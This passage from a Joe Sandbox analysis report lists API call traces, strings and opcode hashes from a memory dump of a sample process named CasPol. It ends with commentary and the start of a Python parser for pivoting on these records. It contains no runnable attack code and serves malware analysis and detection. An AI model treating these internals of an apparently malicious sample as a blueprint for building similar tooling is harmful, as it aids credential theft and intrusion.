                                                                                                                  • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                  • memset.MSVCRT ref: 0040C4D0
                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4131475296-0
                                                                                                                  • Opcode ID: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                                                                                                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                  • Opcode Fuzzy Hash: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                                                                                                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004116FF
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                  • API String ID: 2618321458-3614832568
                                                                                                                  • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                  • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                  • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                  • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFilefreememset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2507021081-0
                                                                                                                  • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                  • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                  • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                  • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                  APIs
                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                  • malloc.MSVCRT ref: 00417524
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                  • free.MSVCRT ref: 00417544
                                                                                                                  • free.MSVCRT ref: 00417562
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4131324427-0
                                                                                                                  • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                  • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                  • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                  • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                  • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                  • free.MSVCRT ref: 0041822B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: PathTemp$free
                                                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                                                  • API String ID: 924794160-1420421710
                                                                                                                  • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                  • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                  APIs
                                                                                                                  • wcscpy.MSVCRT ref: 0041477F
                                                                                                                  • wcscpy.MSVCRT ref: 0041479A
                                                                                                                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                  • String ID: General
                                                                                                                  • API String ID: 999786162-26480598
                                                                                                                  • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                  • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                  • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                  • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                                                                  • String ID: Error$Error %d: %s
                                                                                                                  • API String ID: 313946961-1552265934
                                                                                                                  • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                  • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                  • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                  • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                  • API String ID: 3510742995-272990098
                                                                                                                  • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                  • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                  • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                  • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0044A6EB
                                                                                                                  • memset.MSVCRT ref: 0044A6FB
                                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpymemset
                                                                                                                  • String ID: gj
                                                                                                                  • API String ID: 1297977491-4203073231
                                                                                                                  • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                  • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                  • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                  • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                  • free.MSVCRT ref: 0040E9D3
                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@$free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2241099983-0
                                                                                                                  • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                  • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                  • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                  • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                  APIs
                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                  • malloc.MSVCRT ref: 004174BD
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                  • free.MSVCRT ref: 004174E4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4053608372-0
                                                                                                                  • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                  • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                  • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                  • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(?), ref: 0040D453
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Rect$ClientParentPoints
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4247780290-0
                                                                                                                  • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                  • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                  • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                  • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                  • memset.MSVCRT ref: 004450CD
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1471605966-0
                                                                                                                  • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                  • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                  APIs
                                                                                                                  • wcscpy.MSVCRT ref: 0044475F
                                                                                                                  • wcscat.MSVCRT ref: 0044476E
                                                                                                                  • wcscat.MSVCRT ref: 0044477F
                                                                                                                  • wcscat.MSVCRT ref: 0044478E
                                                                                                                    • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                    • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                    • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                                                    • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                  • String ID: \StringFileInfo\
                                                                                                                  • API String ID: 102104167-2245444037
                                                                                                                  • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                  • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                  • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                  • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                  APIs
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ??3@
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 613200358-0
                                                                                                                  • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                  • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                  • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                  • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004100FB
                                                                                                                  • memset.MSVCRT ref: 00410112
                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                  • _snwprintf.MSVCRT ref: 00410141
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                  • String ID: </%s>
                                                                                                                  • API String ID: 3400436232-259020660
                                                                                                                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040D58D
                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                  • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                  • String ID: caption
                                                                                                                  • API String ID: 1523050162-4135340389
                                                                                                                  • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                  • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                  • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                  • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
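The records above follow a fixed layout (APIs, Strings, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity, then the opcode and instruction hashes), which makes them easy to pivot on across reports once parsed. Two points worth knowing before pivoting: the three "foreign key" messages are SQLite's own error strings from its CREATE TABLE foreign-key parser, and the AreFileApisANSI / WideCharToMultiByte / malloc / free sequence is consistent with the Unicode-to-MBCS helper in SQLite's Win32 VFS, so these particular functions are embedded library code rather than the sample's own logic. The parser below is an added example, not Joe Sandbox code; its input is a constructed excerpt of three records copied from this page (the second and third truncated to a few fields), and the `records_calling` / `records_with_string` helpers and the `image_base` property are my own names. Addresses in `ref:` are virtual addresses in the dump, so the parser keeps the `Offset:` from the Source File line to turn them into RVAs, which is what you compare when the same code is loaded at different bases.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records into pivotable objects.
Added example; not Joe Sandbox code.  Helper names are illustrative."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: three records copied from the report above (records two and
# three truncated to a few fields).  Lines are stripped, so page indentation is ignored.
SAMPLE = """
APIs
• AreFileApisANSI.KERNEL32 ref: 00417497
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
• malloc.MSVCRT ref: 004174BD
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
• free.MSVCRT ref: 004174E4
Memory Dump Source
• Source File: 0000000D.00000002.2087264896.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
Similarity
• API ID: ByteCharMultiWide$ApisFilefreemalloc
• String ID:
• API String ID: 4053608372-0
• Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
• Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
APIs
Strings
• unknown column "%s" in foreign key definition, xrefs: 00431858
• foreign key on %s should reference only one column of table %T, xrefs: 004316CD
• number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
Similarity
• API ID: memcpy
• API String ID: 3510742995-272990098
• Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
APIs
  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
• ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
• free.MSVCRT ref: 0040E9D3
  • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
Similarity
• API ID: ??3@$free
• API String ID: 2241099983-0
• Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
"""

# "• [Part of subcall function ADDR: ]symbol.MODULE[(args)], ref: ADDR"
API_RE = re.compile(r"^(?:Part of subcall function ([0-9A-F]+): )?"
                    r"([^\s(]+)\.([A-Z0-9]+)(?:\(([^)]*)\))?,? ref: ([0-9A-F]+)$")
STR_RE = re.compile(r"^(.*), xrefs: ([0-9A-F]+)$")        # "• text, xrefs: ADDR"
KV_RE = re.compile(r"^([^:]+):\s*(.*)$")                  # "• Key: value"
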